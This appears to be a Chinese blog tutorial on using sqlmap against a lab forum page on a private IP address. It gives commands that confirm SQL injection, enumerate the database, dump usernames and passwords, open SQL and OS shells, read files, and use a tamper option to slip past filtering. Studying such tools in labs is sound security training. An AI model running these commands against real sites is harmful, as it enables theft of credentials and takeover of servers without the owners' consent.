当前位置: 首页 > news >正文

SQLMap工具运用

概念

官⽹:https://sqlmap.org/
作⽤:sqlmap是⼀个开源的渗透测试⼯具,它可以⾃动化检测和利⽤SQL注⼊漏洞并接管数据库服务器。它有⼀个强⼤的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项

注意:kali⾃带

使⽤实战

简单帮助: python sqlmap.py -h 详细帮助: python sqlmap.py -hh 清除缓存: python --purge

基本操作

物理机:cmd ipconfig VMnet8:

获取服务器的IP地址,实战中体现在信息收集这一环,或者是与企业合作的白盒测试。

使用Kali带的SQLmap检测漏洞:

sqlmap -u 'http://192.168.162.129/bbs/bbs/showmessage.php?id=3'

✅ 注入结果总结

从 sqlmap 日志可以看出,你已经成功拿下目标http://192.168.162.129/bbs/bbs/showmessage.php?id=3的 SQL 注入漏洞,核心信息如下:

🔍 已确认的注入类型

sqlmap 识别出id参数存在4 种可利用的注入方式

  1. 布尔盲注(Boolean-based blind)
    • 利用页面真假响应差异判断数据,Payload 示例:id=3 AND 9285=9285
  2. 报错注入(Error-based)
    • 基于 MySQLEXTRACTVALUE函数的报错回显,可直接获取数据
  3. 时间盲注(Time-based blind)
    • 基于SLEEP()函数的延迟判断,适用于无回显场景
  4. UNION 查询注入(UNION query)
    • 目标表共4 列,可直接通过UNION ALL SELECT拼接查询结果

📊 目标环境信息
  • 后端数据库:MySQL ≥ 5.1
  • Web 服务器:Apache 2.4.23 + PHP 5.4.45
  • 操作系统:Windows
  • 数据已保存至:/root/.local/share/sqlmap/output/192.168.162.129/

查询当前数据库:

sqlmap -u "http://192.168.162.129/bbs/bbs/showmessage.php?id=3" --current-db

这里在执行过程中发现并没有爆出数据库名字所以把这张图片丢给ai,把上方命令输入对话框并对ai说把这个命令改为可执行命令,以后遇到类似问题可以灵活变通。

sqlmap -u "http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3" --current-db --random-agent --tamper=space2comment --no-cast

得到数据库名叫jrlt,接下来查寻数据库有哪些表

当前库有哪些表:

sqlmap -u 'http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3' -D jrlt --tables

看到存在messages和users表

某表有哪些字段:

sqlmap -u 'http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3' -D jrlt -T users --columns

列出内容(数据):

sqlmap -u 'http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3' -D jrlt -T users -C name,password --dump # 卡住的话 不停的 敲回⻋ 输⼊y

成功爆出最终数据

拓展操作

(命令都是在有SQL漏洞的前提下组装的)

执⾏sql(# 卡住的话 不停的 敲回⻋ 输⼊y)

sqlmap -u 'http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3' --sql-shell select * from messages exit # 退出输⼊

弱密码爆破

sqlmap -u 'http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3' --password

执行系统命令

sqlmap -u 'http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3' --os-shell dir ... exit # 退出输⼊

读取文件

sqlmap -u 'http://192.168.162.129:90/bbs/bbs/showmessage.php?id=3' --file-read "D:\e.txt"
http://www.jsqmd.com/news/520466/

相关文章:

  • HY-MT1.5-7B翻译模型实战:从部署到调用,新手完整操作流程
  • 2026年热门的水下振动传感器公司推荐:水下振动传感器公司选择指南 - 品牌宣传支持者
  • MCP 2.0协议签名机制失效预警:3个被92%企业忽略的证书链成本陷阱(含TLS 1.3兼容性避坑清单)
  • 基于 STM32CubeMX 的 UNIT-00:Berserk Interface 嵌入式部署指南
  • 【Ubuntu】自动化安全升级:配置 unattended-upgrades 的最佳实践
  • 3种合规访问方案:让信息工作者高效获取优质内容
  • 零基础入门学用物联网(ESP8266) 第一部分 基础知识篇(五)
  • Youtu-Parsing模型一键部署教程:10分钟搞定开源多模态解析环境
  • Guohua Diffusion 提示词(Prompt)工程详解:从基础到高级技巧
  • Arduino轻量级模板化按钮消抖库设计与应用
  • Linux常用命令大全:Z-Image-Turbo模型部署与运维必备技能
  • 实战突破:MuJoCo分布式仿真的5大性能优化策略
  • DSMR协议嵌入式解析库:面向电表数据采集的轻量级实现
  • Nanbeige 4.1-3B极简WebUI完整教程:环境配置到高级功能使用
  • 无需编程基础:用Qwen3-4B写作大师生成可运行代码的完整流程
  • 嵌入式PacketBuffer:面向数据包的轻量级FIFO缓冲区设计
  • css常用功能总结(二)(常用元素属性)
  • 从“拍脑袋补货”到“预测驱动”:我是如何用销量预测模型将库存周转率提升30%的
  • Stable Yogi Leather-Dress-Collection 入门:JavaScript调用模型API完整示例
  • 【Unity URP】深入解析Rendering Debugger与MipMap可视化实践
  • UART串口通信原理与STM32工程实践指南
  • 保姆级教程:用MATLAB/Simulink手把手搭建直流电机模糊PID调速仿真模型
  • UDOP-large效果展示:英文发票字段抽取、表格识别高清结果集
  • 2026年正规的襄阳坐月子护理推荐:襄阳坐月子一对一护理宝妈真实推荐 - 品牌宣传支持者
  • 企业多VLAN网络构建实战——DHCP中继与VLAN间通信配置详解
  • Android13 编译ninja失败:exit status 137 的内存优化实战
  • 利用 Hough 变换处理量测得到的含杂波的二维坐标,解决多目标航迹起始问题(Matlab代码实现)
  • 造相-Z-Image-Turbo 结合Python爬虫:自动构建特定风格训练数据集
  • DeOldify与数据库联动:开发基于MySQL的图片处理任务管理系统
  • Vivado工程移植血泪史:IP核被锁、路径丢失?手把手教你从源码重建自定义IP